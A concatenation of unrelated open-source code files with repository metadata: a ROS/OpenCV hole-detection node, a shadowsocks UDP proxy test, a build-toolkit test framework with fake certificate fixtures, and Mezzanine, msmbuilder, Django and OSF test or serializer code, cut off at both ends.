frame_gray = cv2.cvtColor(color_img, cv.CV_RGB2GRAY)
processed_rgb = self.process_rgb(color_img)
if FULL_VISUALIZE and not NO_VISUALIZATION:
cv2.imshow("processed_rgb", processed_rgb)
contours_rgb, hierarchy = cv2.findContours(processed_rgb,
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
# # Filter contours (min max area and min max axis length)
contours_rgb = merge_contours(contours_rgb)
contours_rgb, approx_rgb = filter_contours(contours_rgb)
contours_rgb = merge_contours_holes(contours_rgb)
size = color_img.shape
size = (size[1] - 1, size[0] - 1)
cross_w = size[0] / 2 + vision_constants.CROSS_OFF_X
cross_h = size[1] / 2 + vision_constants.CROSS_OFF_Y
cv2.line(color_img_display,
(cross_w, 0),
(cross_w, size[1]),
(255, 255, 0))
cv2.line(color_img_display,
(0, cross_h),
(size[0], cross_h),
(255, 255, 0))
msg_array = PoseStampedLabeledArray()
if not self.training:
time = rospy.Time.now()
msg_array.header.stamp = time
msg_array.header.frame_id = '/arm_base_link'
msg_array.detection_type = 'rgb'
# ## RGB Pipeline
#cv2.drawContours(color_img_display, contours_rgb, -1, (255,0,0), 3)
global_mask_rgb = np.zeros(color_img.shape, dtype=np.uint8)
holes_rgb = get_holes(contours_rgb, frame_gray, global_mask=global_mask_rgb)
## walk through holes
if not self.training:
for i, o in enumerate(holes_rgb):
hole_label = "unknown"
center = o['center']
angle = o['angle']
features = o['features']
cv2.drawContours(color_img_display, [o['contour']], -1, (255, 0, 0), 3)
cv2.circle(color_img_display, tuple(center), 3, (0, 0, 255), 2)
r = 30
#res = classifier_r.find_label(features)
#print res
#hole_label = res[1]
hole_label = j48_holes(features)
cv2.putText(color_img_display, hole_label,
(center[0] - len(hole_label) * 7, center[1] + 15 + int(features[2] / 2)),
cv2.FONT_HERSHEY_PLAIN,
1.5, (0, 255, 0), thickness=2)
if hole_label == 'M20_100_horizontal':
string_res, res = find_m20_head(o['contour'], center, -angle)
#print res
if string_res == 'Down':
#print 'Down', angle
#angle = math.pi - angle
vec = [[0, -1]]
rot_vec = np.array(rotate_point(vec, (0, 0), angle))
#vec = np.array([sin(angle),-cos(angle)])
vec = np.int32(rot_vec * 1 / 2. * features[2])
cv2.circle(color_img_display, tuple(center + vec), 3, (0, 0, 255), 2)
angle += math.pi
#print vec
if string_res == 'Top':
vec = [[0, 1]]
rot_vec = np.array(rotate_point(vec, (0, 0), angle))
#vec = np.array([sin(angle),-cos(angle)])
vec = np.int32(rot_vec * 1 / 2. * features[2])
cv2.circle(color_img_display, tuple(center + vec), 3, (0, 0, 255), 2)
#print 'Top', angle
#print vec
center += m_to_pixel(0.015) * rot_vec
#cv2.drawContours(color_img_display, [res], -1, (255,0,0), 3)
cv2.line(color_img_display,
tuple(np.int32(center) + np.int32([r * cos(angle), r * sin(angle)])),
tuple(np.int32(center) - np.int32([r * cos(angle), r * sin(angle)])),
(0, 0, 255),
2)
## create message
xdist = center[0] - cross_w
ydist = center[1] - cross_h
x_m = pixel_to_m(xdist)
y_m = pixel_to_m(ydist)
msg = PoseStampedLabeled()
msg.pose.header.frame_id = '/arm_base_link'
msg.pose.header.stamp = time
#double check
msg.pose.pose.position.x = y_m
msg.pose.pose.position.y = x_m
quat = tf.transformations.quaternion_from_euler(0, 0, angle)
msg.pose.pose.orientation.x = quat[0]
msg.pose.pose.orientation.y = quat[1]
msg.pose.pose.orientation.z = quat[2]
msg.pose.pose.orientation.w = quat[3]
#print xdist, ydist
#print self.angle
msg.label = hole_label
msg.detection_type = 'rgb'
msg_array.poses.append(msg)
if self.training:
best_rgb = get_darkest_hole(holes_rgb, frame_gray, size)
cv2.drawContours(color_img_display, [best_rgb['contour']], -1, (255, 0, 0), 3)
center = best_rgb['center']
angle = best_rgb['angle']
cv2.circle(color_img_display, tuple(center), 3, (0, 0, 255), 2)
r = 30
cv2.line(color_img_display,
tuple(np.int32(center) + np.int32([r * cos(angle), r * sin(angle)])),
tuple(np.int32(center) - np.int32([r * cos(angle), r * sin(angle)])),
(0, 0, 255),
2)
cv2.putText(color_img_display, "selected", (center[0], center[1]), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0),
thickness=2)
cv2.imshow("hole detection contours_rgb", color_img_display)
#cv2.moveWindow('camera contours_rgb', size_x, size_y)
return best_rgb['features']
# show camera image with annotations
if FULL_VISUALIZE and not NO_VISUALIZATION:
#RGB
hole_image = color_img
kernel = np.ones((9, 9), 'uint8')
global_mask_rgb = cv2.erode(global_mask_rgb, kernel)
hole_image[global_mask_rgb == 0] = 255
cv2.imshow("holes_rgb", hole_image)
#cv2.moveWindow('holes_rgb', 0, size_y)
if not NO_VISUALIZATION:
cv2.imshow("hole detection contours_rgb", color_img_display)
#cv2.moveWindow('camera contours_rgb', size_x, size_y)
self.pose_pub.publish(msg_array)
# publish to ROS
small_img = color_img_display  # annotated detection image
cv_mat = cv.fromarray(small_img)
img_msg = self.bridge.cv_to_imgmsg(cv_mat, encoding="bgr8")
self.img_pub.publish(img_msg)
if __name__ == "__main__":
rospy.init_node("detect_holes_rgb")
detect = DetectHolesRGB()
rospy.spin()
# to be safe, send a zero twist
# vs.send_twist(0, 0)
cv.DestroyAllWindows()
| mit |
free2000fly/shadowsocks | tests/test_udp_src.py | 1009 | 2482 | #!/usr/bin/python
import socket
import socks
SERVER_IP = '127.0.0.1'
SERVER_PORT = 1081
if __name__ == '__main__':
# Test 1: same source port IPv4
sock_out = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_out.set_proxy(socks.SOCKS5, SERVER_IP, SERVER_PORT)
sock_out.bind(('127.0.0.1', 9000))
sock_in1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in1.bind(('127.0.0.1', 9001))
sock_in2.bind(('127.0.0.1', 9002))
sock_out.sendto(b'data', ('127.0.0.1', 9001))
result1 = sock_in1.recvfrom(8)
sock_out.sendto(b'data', ('127.0.0.1', 9002))
result2 = sock_in2.recvfrom(8)
sock_out.close()
sock_in1.close()
sock_in2.close()
# make sure they're from the same source port
assert result1 == result2
# Test 2: same source port IPv6
# try again from the same port but IPv6
sock_out = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_out.set_proxy(socks.SOCKS5, SERVER_IP, SERVER_PORT)
sock_out.bind(('127.0.0.1', 9000))
sock_in1 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in2 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in1.bind(('::1', 9001))
sock_in2.bind(('::1', 9002))
sock_out.sendto(b'data', ('::1', 9001))
result1 = sock_in1.recvfrom(8)
sock_out.sendto(b'data', ('::1', 9002))
result2 = sock_in2.recvfrom(8)
sock_out.close()
sock_in1.close()
sock_in2.close()
# make sure they're from the same source port
assert result1 == result2
# Test 3: different source ports IPv6
sock_out = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_out.set_proxy(socks.SOCKS5, SERVER_IP, SERVER_PORT)
sock_out.bind(('127.0.0.1', 9003))
sock_in1 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM,
socket.SOL_UDP)
sock_in1.bind(('::1', 9001))
sock_out.sendto(b'data', ('::1', 9001))
result3 = sock_in1.recvfrom(8)
# make sure they're from different source ports
assert result1 != result3
sock_out.close()
sock_in1.close()
| apache-2.0 |
taxilian/swtoolkit | lib/TestFramework.py | 18 | 11615 | #!/usr/bin/python2.4
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Testing framework for the software construction toolkit.
A TestFramework environment object is created via the usual invocation:
import TestFramework
test = TestFramework.TestFramework()
TestFramework is a subclass of TestCommon, which is in turn is a subclass
of TestCmd.
"""
import base64
import os
import re
import sys
import unittest
import TestCommon
import TestSCons
diff_re = TestCommon.diff_re
fail_test = TestCommon.fail_test
no_result = TestCommon.no_result
pass_test = TestCommon.pass_test
match_exact = TestCommon.match_exact
match_re = TestCommon.match_re
match_re_dotall = TestCommon.match_re_dotall
python_executable = TestCommon.python_executable
exe_suffix = TestCommon.exe_suffix
obj_suffix = TestCommon.obj_suffix
shobj_suffix = TestCommon.shobj_suffix
lib_prefix = TestCommon.lib_prefix
lib_suffix = TestCommon.lib_suffix
dll_prefix = TestCommon.dll_prefix
dll_suffix = TestCommon.dll_suffix
file_expr = TestSCons.file_expr
def RunUnitTests(testcase, **kwargs):
"""Runs all unit tests from a test case.
Args:
testcase: Test case class (derived from unittest.TestCase)
kwargs: Optional variables to inject into each test case object.
For example:
RunUnitTests(MyToolTests, scons_globals=scons_globals, root_env=env)
If a test fails, exits the program via sys.exit(3).
"""
# Make the test suite
suite = unittest.makeSuite(testcase)
# Inject variables into each test
for t in suite._tests:
for k, v in kwargs.items():
setattr(t, k, v)
# Run test
result = unittest.TextTestRunner(verbosity=2).run(suite)
if not result.wasSuccessful():
# A unit test failed
sys.exit(3)
class TestFramework(TestCommon.TestCommon):
"""Class for testing this framework.
Default behavior is to test hammer.bat on Windows or hammer.sh on
any other type of system.
A temporary directory gets created (we chdir there) and will be removed
automatically when we exit.
"""
def __init__(self, *args, **kw):
# If they haven't specified that they want to test some other
# explicit program, either in the TestFramework() object creation or
# by setting the $TEST_FRAMEWORK_EXE / %TEST_FRAMEWORK_EXE% environment
# variable, then we test 'hammer.bat' on Windows systems and 'hammer.sh'
# everywhere else.
if not 'program' in kw:
kw['program'] = os.environ.get('TEST_FRAMEWORK_EXE')
if not kw['program']:
if sys.platform == 'win32':
kw['program'] = 'hammer.bat'
else:
kw['program'] = os.getcwd() + '/hammer.sh'
# Pass in the magic workdir value '', which will cause a temporary
# directory to be created and get us chdir'ed there--but save
# the original cwd first in case we need to know where we were...
if not 'workdir' in kw:
kw['workdir'] = ''
TestCommon.TestCommon.__init__(self, *args, **kw)
# Use our match function, so we don't need to worry about trailing
# whitespace on output we want to compare.
self.match = self.match_visible
def FakeWindowsCER(self, filename):
"""Write out a fake windows certificate."""
# Generated with:
# makecert.exe -r -sv fake.pvk -n "CN=fakeco" fake.cer (password: secret)
self.write(filename, base64.b64decode("""
MIIB7TCCAVagAwIBAgIQcInZW/UOFodA41ESSHTYuzANBgkqhkiG9w0BAQQFADARMQ8wDQYDVQQD
EwZmYWtlY28wHhcNMDgwNTA3MjAyNjI2WhcNMzkxMjMxMjM1OTU5WjARMQ8wDQYDVQQDEwZmYWtl
Y28wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANERhPhli6dLzhU3xFO81uVPrluufLF9lqF6
tNCN4cX+5JaDWZzjiX+fHR/M+8od6f2VXZ6fML9uIq/8cWOQL/oqfKbX7R/MWCvOzsrpI7iLJu4Z
uYl+VhUWt3bxjl7bfH89NOS5cZhGuF7z/nVS0J0yconFhkFs6IBp3dKMuHMhAgMBAAGjRjBEMEIG
A1UdAQQ7MDmAELq4xibLMx3dvWmlZHSr8S2hEzARMQ8wDQYDVQQDEwZmYWtlY2+CEHCJ2Vv1DhaH
QONREkh02LswDQYJKoZIhvcNAQEEBQADgYEARvV1vBoIoP1DZosFVr11HLgKhffKhXxh8XfFLxd1
JMJc/j8x0iNlW3IcVWNeDxh8x3TTJYODTM9WPXi2PL/Ouw2dPToYRnS5vP31EoXGLYlvp1sxnyzo
LLE9zUGKBTvHeaWVjHhDh66dWS9ss6pXcVrElSgZVlBTg6jZgvxV27A=
"""))
def FakeWindowsPVK(self, filename):
"""Write out a fake private key file."""
# Generated with:
# makecert.exe -r -sv fake.pvk -n "CN=fakeco" fake.cer (password: secret)
self.write(filename, base64.b64decode("""
HvG1sAAAAAACAAAAAQAAABAAAABUAgAAHXQX+j2ePmaFlOVCODMBigcCAAAAJAAA6tHDlTGLFBkD
JbgKswhpzNuqXFUxW3ZYGQb5oH9wy5UCpIddroTpfpM8y7PMz1YWCJ2ijqIdAksv3qc9pV5xlRyF
YalQoLXPn9wklkYMbl2zBQAXnDgCy3JWa07tjCIMelieKQNzsCkTHq3iPpuF/IeL+q8o0AtxizK/
SeKLVc3VXH9F6L3pIKFud0UwvFD2Phea8OhWkTsRdz9kQTKXgW2ScIhEqea9w04jY/7bOJJB9JzQ
75beIS3inuKD7r/Ynf2VJzI+AGY0Zkyq48Pmjx9yGBuMId0T4o8K4pSfQiWc5NLfLP6Jz7IzAUHW
+r+9X/8p84IA5YNMeWYommfxjwHl6r0R4UOQaA2hseoq+Tqf6B6lfuWYCrZl7u8D/VYvyYWlImWg
G3jJyRUwDKAyZ6/hTdGU7mlcRPMjAvg4CyWQCp9CLT4JziRxEaoQWbKQLDcVIGMqmytqujbuZBtl
hR1v571uD7daAW8iKPhjkaBjAALa7kmzDIS8DY7YuMAmvV7stzBW8q/eLakmN9UWnlmpDHeCEmuj
tjXhDIONv7j63So8W3B5umRJMD8eM4rC0/9Pu1e2BVlPc6J5Dgo1ZGCKmdtb8zzv0Ea7xlc2ZLU+
lqdiYR6DgsEH6gvjLzYK491yQMCbC9l9lOwhLHTGrtHsXKZyM4Puid3ODAkHlMZy4D9feWakVhpS
DmB7w6ikflbPvsx200M9FMbXkcXkT6LMFmye4D8uCaooPYJDrBLVFi9gbAXtRj8WJ2+hRefzG5+N
pEUUTCf3tuiV
"""))
def FakeWindowsPFX(self, filename):
"""Write out a fake windows certificate + private key file."""
# Generated using:
# makecert.exe -r -sv fake.pvk -n "CN=fakeco" fake.cer (password: secret)
# pvk2pfx.exe -pvk fake.pvk -spc fake.cer -pfx fake.pfx -po obscure
self.write(filename, base64.b64decode("""
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
"""))
def match_visible(self, str1, str2):
"""Returns true if the strings look the same.
Args:
str1: First string to compare.
str2: Second string to compare.
Returns:
True if the strings are the same, after stripping trailing whitespace
from lines. That is, if they look the same when printed to a terminal.
"""
# Add a newline at end of the strings, in case strings have trailing
# whitespace but no newline at the end.
str1 = re.sub('[ \t\r]*\n', '\n', str1 + '\n')
str2 = re.sub('[ \t\r]*\n', '\n', str2 + '\n')
return str1 == str2
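# Behavior sketch: trailing whitespace on a line is ignored, leading
# whitespace is not (illustrative doctest-style calls):
#
#   >>> t = TestFramework()
#   >>> t.match_visible('a \nb\t', 'a\nb')
#   True
#   >>> t.match_visible(' a\nb', 'a\nb')
#   False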
def WriteSConscript(self, filename, function, python_paths=None):
"""Writes a SConscript which will call the function.
Args:
filename: Destination filename.
function: Function to call from SConscript. This will be passed the
globals() dict from the SConscript.
python_paths: List of additional python paths to include in sys.path
for SConscript.
If the function needs access to SCons functions or variables, it should
get them from the passed globals dict:
def MySConscript(scons_globals):
Environment = scons_globals['Environment']
...
Returns:
Passthrough return from self.write().
"""
if python_paths is None:
python_paths = []
func_path, func_file = os.path.split(function.func_code.co_filename)
python_paths += [
# Directory containing the module with the function to call
func_path,
# Directory containing THIS module, since the module calling it most
# likely imports it, and the path to the TestCommon module, since this
# file imports it.
os.path.dirname(__file__),
os.path.dirname(TestCommon.__file__),
]
data = ('# SConscript file '
'automatically created by TestFramework.WriteSConscript().\n'
'import sys\n')
for p in python_paths:
# Need to turn backslashes into forward-slashes, since we're writing a
# string into a python source file. (Could alternatively double up the
# backslashes.)
data += 'sys.path.append("%s")\n' % p.replace('\\', '/')
data += 'from %s import %s\n%s(globals())\n' % (
os.path.splitext(func_file)[0],
function.__name__,
function.__name__
)
return self.write(filename, data)
| bsd-3-clause |
nikolas/mezzanine | mezzanine/bin/runtests.py | 34 | 2233 | from __future__ import unicode_literals
import atexit
import os
import shutil
import sys
import django
def main(package="mezzanine"):
"""
This is the main test function called via ``python setup.py test``.
It's responsible for hacking the ``project_template`` dir into
an actual project to test against.
"""
from mezzanine.utils.importing import path_for_import
package_path = path_for_import(package)
project_path = os.path.join(package_path, "project_template")
os.environ["DJANGO_SETTINGS_MODULE"] = "project_name.test_settings"
project_app_path = os.path.join(project_path, "project_name")
local_settings_path = os.path.join(project_app_path, "local_settings.py")
test_settings_path = os.path.join(project_app_path, "test_settings.py")
sys.path.insert(0, package_path)
sys.path.insert(0, project_path)
if not os.path.exists(test_settings_path):
shutil.copy(local_settings_path + ".template", test_settings_path)
with open(test_settings_path, "r") as f:
local_settings = f.read()
with open(test_settings_path, "w") as f:
test_settings = """
from . import settings
globals().update(i for i in settings.__dict__.items() if i[0].isupper())
# Require the mezzanine.accounts app. We use settings.INSTALLED_APPS here so
# the syntax test doesn't complain about an undefined name.
if "mezzanine.accounts" not in settings.INSTALLED_APPS:
INSTALLED_APPS = list(settings.INSTALLED_APPS) + ["mezzanine.accounts"]
# Use the MD5 password hasher by default for quicker test runs.
PASSWORD_HASHERS = ('django.contrib.auth.hashers.MD5PasswordHasher',)
"""
f.write(test_settings + local_settings)
def cleanup_test_settings():
import os # Outer scope sometimes unavailable in atexit functions.
for fn in [test_settings_path, test_settings_path + 'c']:
try:
os.remove(fn)
except OSError:
pass
atexit.register(cleanup_test_settings)
django.setup()
from django.core.management.commands import test
sys.exit(test.Command().execute(verbosity=1))
if __name__ == "__main__":
main()
| bsd-2-clause |
stephenliu1989/msmbuilder | msmbuilder/tests/test_featurizer.py | 1 | 3123 | import numpy as np
from mdtraj import compute_dihedrals, compute_phi
from mdtraj.testing import eq
from msmbuilder.example_datasets import fetch_alanine_dipeptide
from msmbuilder.featurizer import get_atompair_indices, FunctionFeaturizer, \
DihedralFeaturizer, AtomPairsFeaturizer, SuperposeFeaturizer, \
RMSDFeaturizer, VonMisesFeaturizer, Slicer
def test_function_featurizer():
dataset = fetch_alanine_dipeptide()
trajectories = dataset["trajectories"]
trj0 = trajectories[0]
# use the dihedral to compute phi for ala
atom_ind = [[4, 6, 8, 14]]
func = compute_dihedrals
# test with args
f = FunctionFeaturizer(func, func_args={"indices": atom_ind})
res1 = f.transform([trj0])
# test with a function wrapped inside another function, without any args
def funcception(trj):
return compute_phi(trj)[1]
f = FunctionFeaturizer(funcception)
res2 = f.transform([trj0])
# known results
f3 = DihedralFeaturizer(['phi'], sincos=False)
res3 = f3.transform([trj0])
# compare all
for r in [res2, res3]:
np.testing.assert_array_almost_equal(res1, r)
def test_that_all_featurizers_run():
# TODO: include all featurizers, perhaps with generator tests
dataset = fetch_alanine_dipeptide()
trajectories = dataset["trajectories"]
trj0 = trajectories[0][0]
atom_indices, pair_indices = get_atompair_indices(trj0)
featurizer = AtomPairsFeaturizer(pair_indices)
X_all = featurizer.transform(trajectories)
featurizer = SuperposeFeaturizer(np.arange(15), trj0)
X_all = featurizer.transform(trajectories)
featurizer = DihedralFeaturizer(["phi", "psi"])
X_all = featurizer.transform(trajectories)
featurizer = VonMisesFeaturizer(["phi", "psi"])
X_all = featurizer.transform(trajectories)
# Below doesn't work on ALA dipeptide
# featurizer = msmbuilder.featurizer.ContactFeaturizer()
# X_all = featurizer.transform(trajectories)
featurizer = RMSDFeaturizer(trj0)
X_all = featurizer.transform(trajectories)
def test_von_mises_featurizer():
dataset = fetch_alanine_dipeptide()
trajectories = dataset["trajectories"]
featurizer = VonMisesFeaturizer(["phi", "psi"], n_bins=18)
X_all = featurizer.transform(trajectories)
n_frames = trajectories[0].n_frames
assert X_all[0].shape == (n_frames, 36), ("unexpected shape returned: (%s, %s)" %
X_all[0].shape)
featurizer = VonMisesFeaturizer(["phi", "psi"], n_bins=10)
X_all = featurizer.transform(trajectories)
assert X_all[0].shape == (n_frames, 20), ("unexpected shape returned: (%s, %s)" %
X_all[0].shape)
def test_slicer():
X = ([np.random.normal(size=(50, 5), loc=np.arange(5))]
+ [np.random.normal(size=(10, 5), loc=np.arange(5))])
slicer = Slicer(index=[0, 1])
Y = slicer.transform(X)
eq(len(Y), len(X))
eq(Y[0].shape, (50, 2))
slicer = Slicer(first=2)
Y2 = slicer.transform(X)
eq(len(Y2), len(X))
eq(Y2[0].shape, (50, 2))
eq(Y[0], Y2[0])
eq(Y[1], Y2[1])
| lgpl-2.1 |
willharris/django | tests/validation/test_error_messages.py | 398 | 3642 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.db import models
class ValidationMessagesTest(TestCase):
def _test_validation_messages(self, field, value, expected):
with self.assertRaises(ValidationError) as cm:
field.clean(value, None)
self.assertEqual(cm.exception.messages, expected)
def test_autofield_field_raises_error_message(self):
f = models.AutoField(primary_key=True)
self._test_validation_messages(f, 'fõo',
["'fõo' value must be an integer."])
def test_integer_field_raises_error_message(self):
f = models.IntegerField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be an integer."])
def test_boolean_field_raises_error_message(self):
f = models.BooleanField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be either True or False."])
def test_float_field_raises_error_message(self):
f = models.FloatField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be a float."])
def test_decimal_field_raises_error_message(self):
f = models.DecimalField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be a decimal number."])
def test_null_boolean_field_raises_error_message(self):
f = models.NullBooleanField()
self._test_validation_messages(f, 'fõo',
["'fõo' value must be either None, True or False."])
def test_date_field_raises_error_message(self):
f = models.DateField()
self._test_validation_messages(f, 'fõo',
["'fõo' value has an invalid date format. "
"It must be in YYYY-MM-DD format."])
self._test_validation_messages(f, 'aaaa-10-10',
["'aaaa-10-10' value has an invalid date format. "
"It must be in YYYY-MM-DD format."])
self._test_validation_messages(f, '2011-13-10',
["'2011-13-10' value has the correct format (YYYY-MM-DD) "
"but it is an invalid date."])
self._test_validation_messages(f, '2011-10-32',
["'2011-10-32' value has the correct format (YYYY-MM-DD) "
"but it is an invalid date."])
def test_datetime_field_raises_error_message(self):
f = models.DateTimeField()
# Wrong format
self._test_validation_messages(f, 'fõo',
["'fõo' value has an invalid format. It must be "
"in YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format."])
# Correct format but invalid date
self._test_validation_messages(f, '2011-10-32',
["'2011-10-32' value has the correct format "
"(YYYY-MM-DD) but it is an invalid date."])
# Correct format but invalid date/time
self._test_validation_messages(f, '2011-10-32 10:10',
["'2011-10-32 10:10' value has the correct format "
"(YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]) "
"but it is an invalid date/time."])
def test_time_field_raises_error_message(self):
f = models.TimeField()
# Wrong format
self._test_validation_messages(f, 'fõo',
["'fõo' value has an invalid format. It must be in "
"HH:MM[:ss[.uuuuuu]] format."])
# Correct format but invalid time
self._test_validation_messages(f, '25:50',
["'25:50' value has the correct format "
"(HH:MM[:ss[.uuuuuu]]) but it is an invalid time."])
| bsd-3-clause |
adlius/osf.io | api/wb/serializers.py | 11 | 2578 | from django.db import IntegrityError
from rest_framework import serializers as ser
from rest_framework import exceptions
from website.files import exceptions as file_exceptions
from api.base.serializers import IDField
class DestinationSerializer(ser.Serializer):
parent = ser.CharField(write_only=True)
target = ser.CharField(write_only=True)
name = ser.CharField(write_only=True, allow_blank=True, allow_null=True)
class WaterbutlerMetadataSerializer(ser.Serializer):
source = ser.CharField(write_only=True)
destination = DestinationSerializer(write_only=True)
id = IDField(source='_id', read_only=True)
kind = ser.CharField(read_only=True)
name = ser.CharField(read_only=True, help_text='Display name used in the general user interface')
created = ser.CharField(read_only=True)
modified = ser.CharField(read_only=True)
path = ser.CharField(read_only=True)
checkout = ser.SerializerMethodField(read_only=True)
version = ser.IntegerField(help_text='Latest file version', read_only=True, source='current_version_number')
downloads = ser.SerializerMethodField()
sha256 = ser.SerializerMethodField()
md5 = ser.SerializerMethodField()
size = ser.SerializerMethodField()
def get_checkout(self, obj):
return obj.checkout._id if obj.checkout else None
def get_downloads(self, obj):
return obj.get_download_count()
def get_sha256(self, obj):
return obj.versions.first().metadata.get('sha256', None) if obj.versions.exists() else None
def get_md5(self, obj):
return obj.versions.first().metadata.get('md5', None) if obj.versions.exists() else None
def get_size(self, obj):
